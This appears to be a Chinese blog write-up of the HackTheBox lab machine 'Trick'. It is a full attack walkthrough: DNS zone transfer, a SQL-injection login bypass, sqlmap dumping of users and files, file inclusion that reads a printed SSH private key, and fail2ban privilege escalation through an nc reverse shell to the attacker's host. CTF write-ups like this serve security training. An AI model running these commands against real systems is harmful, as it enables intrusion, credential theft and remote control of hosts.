HTB-Trick

博客 hexo
HTB
发布日期:   2022-10-08

HTB-Trick

ip:10.10.11.166

nmap -Pn -sS -v -p- 10.10.11.166

截屏2022-08-29 20.44.20.png

爆破22端口失败

hydra 10.10.11.166 ssh -l root -P /usr/share/wordlists/rockyou.txt.gz -t 6 -v -f

查看80端口,抓包看一下请求,没什么用

截屏2022-08-29 20.45.07.png

dig查看一下,发现preprod-payroll.trick.htb

53 - Pentesting DNS

dig axfr trick.htb @10.10.11.166

截屏2022-08-31 12.09.35.png

Fuzz一下有没有其他子域名

ffuf -u http://trick.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: preprod-FUZZ.trick.htb' -fw 1697

截屏2022-08-31 21.04.06.png

发现一个preprod-marketing.trick.htb,添加到hosts

截屏2022-08-31 21.04.56.png

打开页面,只有一个登录窗口,尝试弱口令,未成功

截屏2022-08-31 12.31.19.png

尝试万能密码,成功进入后台

admin' or True -- -
admin

截屏2022-08-31 19.19.08.png

在Users→Action→edit,使用F12大法可以看到密码:

截屏2022-08-31 19.50.08.png

在employee界面添加成员并抓包

截屏2022-08-31 19.22.25.png

抓包如下:

POST /ajax.php?action=save_employee HTTP/1.1
Host: preprod-payroll.trick.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 93
Origin: http://preprod-payroll.trick.htb
Connection: close
Referer: http://preprod-payroll.trick.htb/index.php?page=employee
Cookie: PHPSESSID=sge9952plnojhbr5qeobj5ggkv

id=&firstname=l1b3ri&middlename=l1b3ri&lastname=l1b3ri&department_id=2&position_id=2&salary=2

保存到trick.req,用sqlmap进行扫描尝试:

sqlmap -r employee_sql.req --batch --hex --dbs
sqlmap -r employee_sql.req --batch --hex -D payroll_db --tables --threads 10

截屏2022-08-31 19.45.57.png

sqlmap -r employee_sql.req --batch --hex -D payroll_db --tables --threads 10

截屏2022-08-31 20.06.23.png

sqlmap -r employee_sql.req --batch --hex -D payroll_db -T users --Columns --threads 10

截屏2022-08-31 20.30.11.png

sqlmap -r employee_sql.req --batch --hex -D payroll_db -T users -C name,id,password --dump --threads 10

截屏2022-08-31 20.34.48.png

sqlmap -r employee_sql.req --batch --hex --current-user --threads 10
current user: 'remo@localhost

尝试一下文件读取:

sqlmap -r employee_sql.req --batch --hex --file-read=/etc/hostname --threads 10

这时候发现Users界面和Employee List界面的请求

?page=xxx

猜测是否含有文件包含?抓包尝试

截屏2022-08-31 19.56.25.png

FUZZ一下

wfuzz -w /usr/share/wordlists/Auto_Wordlists/wordlists/file_inclusion_linux.txt -b cookie=sge9952plnojhbr5qeobj5ggkv  "http://preprod-payroll.trick.htb/index.php?page=FUZZ"

截屏2022-08-31 20.51.22.png

失败

尝试preprod-marketing.trick.htb

http://preprod-marketing.trick.htb/index.php?page=about.html

同样尝试fuzz有没有EFI

wfuzz -w /usr/share/wordlists/Auto_Wordlists/wordlists/file_inclusion_linux.txt -b cookie=sge9952plnojhbr5qeobj5ggkv  "http://preprod-marketing.trick.htb/index.php?page=FUZZ"

截屏2022-08-31 21.09.29.png

Successful!

截屏2022-08-31 21.09.57.png

读一下ssh文件

保存到trick_michael.pri

截屏2022-08-31 21.11.46.png

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

截屏2022-08-31 21.26.55.png

linpeas扫一下

截屏2022-08-31 21.29.36.png

第一部分flag

280503ef44e47dc5d1f7c402eb65009f

尝试了几个提权都失败了

截屏2022-08-31 21.45.15.png

Abusing Fail2ban misconfiguration to escalate privileges on Linux

截屏2022-08-31 21.56.10.png

可以看到action.d具有写权限,文章中提示需要将iptables-multiport.conf文件进行复制修改

vim iptables-multiport.conf

截屏2022-08-31 22.03.07.png

修改

/usr/bin/nc 10.10.16.23 1337 -e /usr/bin/bash

截屏2022-08-31 22.09.12.png

mv iptables-multiport.conf /etc/fail2ban/action.d/
tail -n 20 /etc/fail2ban/action.d/iptables-multiport.conf

截屏2022-08-31 22.16.12.png

通过ssh链接失败来触发

patator ssh_login host=trick user=FILE0 password=FILE1 0=/usr/share/wordlists/SecLists/Usernames/Names/familynames-usa-top1000.txt 1=/usr/share/wordlists/SecLists/Passwords/500-worst-passwords.txt

连接成功

截屏2022-08-31 22.49.37.png

文章作者: l1b3r
文章链接: https://l1b3r.github.io/2022/10/08/htb-trick/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 l1b3r !
博客 hexo
  目录